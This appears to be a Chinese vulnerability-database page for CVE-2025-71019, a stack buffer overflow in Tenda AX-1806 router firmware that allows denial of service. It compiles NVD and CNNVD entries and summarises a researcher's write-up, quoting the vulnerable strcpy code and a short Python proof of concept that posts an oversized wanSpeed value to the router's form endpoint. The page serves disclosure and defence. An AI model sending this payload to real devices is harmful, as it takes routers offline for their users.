支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2025-71019 基础信息
漏洞信息
                                        # N/A

## 概述
Tenda AX-1806 v1.0.0.1 存在一个栈溢出漏洞,位于 `sub_65B5C` 函数处理 `wanSpeed` 参数的过程中。

## 影响版本
Tenda AX-1806 v1.0.0.1

## 细节
攻击者可通过构造恶意请求,利用 `sub_65B5C` 函数中对 `wanSpeed` 参数的不当处理触发栈溢出。

## 影响
可导致拒绝服务(DoS),设备可能崩溃或无法正常响应。
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
N/A
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the wanSpeed parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
N/A
来源:美国国家漏洞数据库 NVD
漏洞标题
Tenda AX1806 安全漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
Tenda AX1806是中国腾达(Tenda)公司的一个 WiFi6 无线路由器。 TTenda AX1806 v1.0.0.1版本存在安全漏洞,该漏洞源于sub_65B5C函数的wanSpeed参数存在栈溢出,可能导致通过特制请求造成拒绝服务。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
授权问题
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2025-71019 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2025-71019 的情报信息
  • 标题: VulnbyCola/Tenda/AX-1806/9/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接

    标签:

    神龙速读:
                                            ## Tenda AX-1806 Vulnerability
    
    - **Vendor**: Tenda
    - **Product**: AX-1806
    - **Version**: v1.0.0.1 ([Link to download](https://www.tenda.com.cn/download/detail-3421.html))
    - **Vulnerability Type**: Stack Overflow
    - **Author**: Chuanhao Wan
    - **Email**: chuanhaowan@hust.edu.cn
    - **Institution**: Huazhong University of Science and Technology (HUST)
    
    ### Vulnerability Cause
    
    A stack overflow vulnerability exists in the `sub_65B5C` function. The `wanSpeed` value is obtained from user-controlled input and copied into a fixed-size stack buffer (`v11[32]`) using `strcpy()`, which does not perform bounds checking. An attacker can supply an excessively long value for `wanSpeed`, causing a stack-based buffer overflow and resulting in a Denial of Service (DoS).
    
    ```c
    v2 = (const char *)sub_295C8(a1, "wanSpeed", "0");
    strcpy(v11, v2);
    ```
    
    ### Proof of Concept (PoC)
    
    To reproduce the vulnerability:
    
    1. Boot the firmware using QEMU or another method.
    2. Execute the following Python script for PoC attacks:
    
    ```python
    import requests
    
    url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
    wanSpeed = "A"*7000
    data = {
        "wanSpeed": wanSpeed
    }
    
    r = requests.post(url, data=data)
    print(r.status_code, r.text)
    ```
    
    ### Result
    
    The target router crashes and cannot provide services correctly and persistently, as shown in the provided screenshots.
                                            
    VulnbyCola/Tenda/AX-1806/9/1.md at main · 0-fool/VulnbyCola · GitHub
  • https://nvd.nist.gov/vuln/detail/CVE-2025-71019
四、漏洞 CVE-2025-71019 的评论

暂无评论


发表评论